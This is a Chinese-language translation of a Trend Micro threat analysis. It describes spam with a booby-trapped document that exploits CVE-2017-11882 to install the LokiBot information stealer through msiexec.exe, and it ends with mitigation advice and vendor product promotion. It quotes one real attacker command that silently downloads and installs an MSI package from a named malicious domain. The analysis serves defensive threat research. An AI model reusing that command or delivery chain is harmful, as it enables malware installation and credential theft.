駭客利用 Windows Installer (msiexec.exe) 程式在系統植入 LokiBot 資訊竊取程式


時間拉回 2017 年 9 月,當時 Microsoft 修正了 CVE-2017-11882 這個可讓駭客從遠端執行程式的 Microsoft Office 漏洞。但這仍無法阻止 Cobalt 網路犯罪集團繼續利用此漏洞來散布各種惡意程式,例如FAREITUrsnif 以及某個破解版 Loki 資訊竊取程式 (這是一個以竊取密碼和加密虛擬貨幣錢包為賣點的鍵盤側錄程式)。

最近,趨勢科技發現駭客又再次利用 CVE-2017-11882 漏洞發動攻擊,這次採用的是一種罕見的方法,透過 Microsoft Windows 作業系統中的 Windows Installer 服務。此手法有別於之前使用 Windows 的 mshta.exe 程式來執行 Powershell 腳本以下載並執行惡意檔案的作法,而是透過 Windows Installer 服務當中的「msiexec.exe」程式來執行惡意檔案。

完整感染過程

Figure 1: RATANKBA Infection Flow

圖 1:完整感染過程。

我們所分析到的樣本似乎某一波垃圾郵件所使用的附件檔案,這些垃圾郵件會要求收件人確認寄件人所收到的一筆款項。電子郵件內容含有韓文撰寫的文字,大意是「您好,請檢查一下您的電腦是否中毒或感染惡意程式」,似乎在提醒收件人小心別中毒。

此外,電子郵件也附了一個名為「Payment copy.Doc」的文件檔案,該檔案看似一份付款確認單,但其實是個木馬程式 (趨勢科技命名為:TROJ_CVE201711882.SM),它會攻擊 CVE-2017-11882 漏洞。

Figure 1: RATANKBA Infection Flow

圖 2:隨附惡意文件會攻擊 CVE-2017-11882 漏洞的垃圾郵件。

 Figure 3: How the document will appear to the user

圖 3:文件開啟後的樣子。

惡意附件會利用前述漏洞透過 Windows Installer 服務來下載並安裝一個名為「zus.msi 」的 Windows 安裝套件,其完整指令列如下:

  • Call cmd.exe /c msiexec /q /I “https://www.uwaoma.info/zus.msi”
  •  Figure 4: msiexec download and installation. msiexec.exe gives the binary the file name MSIFD83.tmp

圖 4:經由 msiexec 下載安裝惡意套件 (MSIFD83.tmp 為 msiexec.exe 下載時的暫存檔名)。

 Figure 5: MSIL binary after installation

圖 5:安裝之後的 MSIL 執行檔。

Windows Installer (msiexec.exe) 在下載檔案之後就會安裝一個 MSIL 或 Delphi 執行檔到系統中。視當時下載的 MSI 套件而定,其內容可能包含一個經過複雜加密編碼的 Microsoft Intermediate Language (MSIL) 或 Delphi 執行檔,該執行檔用來載入真正的惡意程式。

值得注意的是,此套件已經過壓縮,因此檔案掃瞄引擎必須將它解開之後才能偵測到它是惡意檔案。不過這點不難,難的是要偵測真正的惡意檔案,因為它深藏在經過複雜加密編碼的 MSIL 或 Delphi 執行檔中。

該執行檔會將自己複製一份 (隨機命名),然後啟動這個複本。這個複本的內容會被掏空並用真正的惡意檔案取代。

 Figure 6: Hollowed out instance of MSIL debugger view

圖 6:被掏空的複本在 MSIL 除錯器中看到的樣子。

我們以前就曾經看過駭客利用此手法來散布某個 LokiBot 變種 (趨勢科技命名為:TROJ_LOKI.SMA),但由於駭客採模組化的設計,因此也可以用來散布其它惡意程式。

 Figure 7: The malware sample we identified as a LokiBot variant

圖 7:我們偵測到的 LokiBot 變種。

駭客為何使用新的安裝手法?

今日的資安軟體已經相當熟悉如何監控那些可能被用來下載惡意程式的執行程序,例如:Wscript、Powershell、Mshta.exe、Winword.exe 及其他越來越常被用來安裝惡意檔案的類似執行檔。由於這些程式使用普遍,因此資安軟體很容易偵測並防止這些軟體的下載威脅。反觀利用 msiexec.exe 來下載惡意 MSI 安裝套件的情況則較為少見。

目前還有其他惡意程式家族如 Andromeda 殭屍網路 (趨勢科技命名為:ANDROM 家族) 也會利用 msiexec.exe 來安裝惡意檔案,差異只在用法不同。Andromeda 的作法是將程式碼注入 msiexec.exe 當中來下載更新和惡意檔案。還有一個重要差別是,當 Andromeda 下載惡意檔案和更新時,其所下載的檔案直接就是 PE 執行檔。而本案例的手法則是下載一個 msiexec.exe 所認得的 MSI 安裝套件,因此要透過 Windows Installer 服務來安裝。

過去惡意程式從未真正利用 MSI 套件來安裝。有別於大多數使用 msiexec.exe 的惡意程式,本案例不是修改其執行檔或執行程序,而是直接利用 Windows Installer 本身的功能來安裝惡意檔案。此外,歹徒通常利用 MSI 套件來安裝一些可能有害的應用程式 (PUA) 而非真正的惡意程式,因此這看來是歹徒最新的一個發展方向。

那麼為何特別選擇這類安裝檔案?我們認為這可能是歹徒躲避資安軟體的一種新技巧,因為資安軟體通常會監控傳統的惡意程式安裝管道。雖然我們確實有發現少數惡意檔案樣本,但我們無法肯定這些樣本就是經由前述方法所下載。不過我們可以推測歹徒應該是鎖定韓文的使用者,因為我們蒐集到的郵件樣本內容採用韓文撰寫。當然,歹徒也有可能是在測試不同的散布方法來看看效果如何。

如何降低風險                             

由於歹徒仍舊是透過網路釣魚郵件為主要散布管道,因此,企業和一般使用者只須養成防範電子郵件威脅的良好習慣就能有效對抗這項攻擊。

在此案例當中,從當下的情境來做判斷相當重要。例如,收件人在收到任何電子郵件要求確認付款回條或一些從未發生過的交易時,應隨時保持警戒。任何異常的訊息、話語或用詞,都是一種警訊。還有,本案例中的郵件內容還特別提醒收件人檢查自己是否中毒,這一點對於付款確認郵件來說相當反常。通常這類商業交易往來郵件,其內容都相當專業而制式化,因此任何錯字或文法錯誤 (尤其如果很多的話) 都很可能是網路釣魚的徵兆。

針對本案例,使用者也可透過停用或管制 Windows Installer 安裝服務來防止駭客在系統植入軟體,或者設定只能由系統管理員來安裝軟體。

趨勢科技解決方案

趨勢科技Deep Security趨勢科技 Vulnerability Protection 漏洞防護 及 TippingPoint 等產品都能提供虛擬修補來防範企業端點因未修補的漏洞而遭到攻擊。

趨勢科技 XGen安全防護能提供跨世代融合的威脅防禦技巧,完整防範各式各樣的威脅,保護資料中心雲端環境網路端點。它藉由高準度的機器學習來保護閘道端點資料和應用程式,保護實體、虛擬及雲端工作負載。XGen™ 能藉由網站/網址過濾、行為分析及客製化沙盒模擬分析,來防範今日針對企業量身訂做的威脅,這些威脅不僅能避開傳統資安防禦,更能利用已知、未知或尚未公開的漏洞。聰明、最佳化、環環相扣的 XGen™ 是趨勢科技 Hybrid Cloud Security 混合雲防護、User Protection 使用者防護以及 Network Defense 網路防禦等解決方案的技術基礎。

 

原文出處:Attack Using Windows Installer msiexec.exe leads to LokiBot 作者:Martin Co 和 Gilbert Sison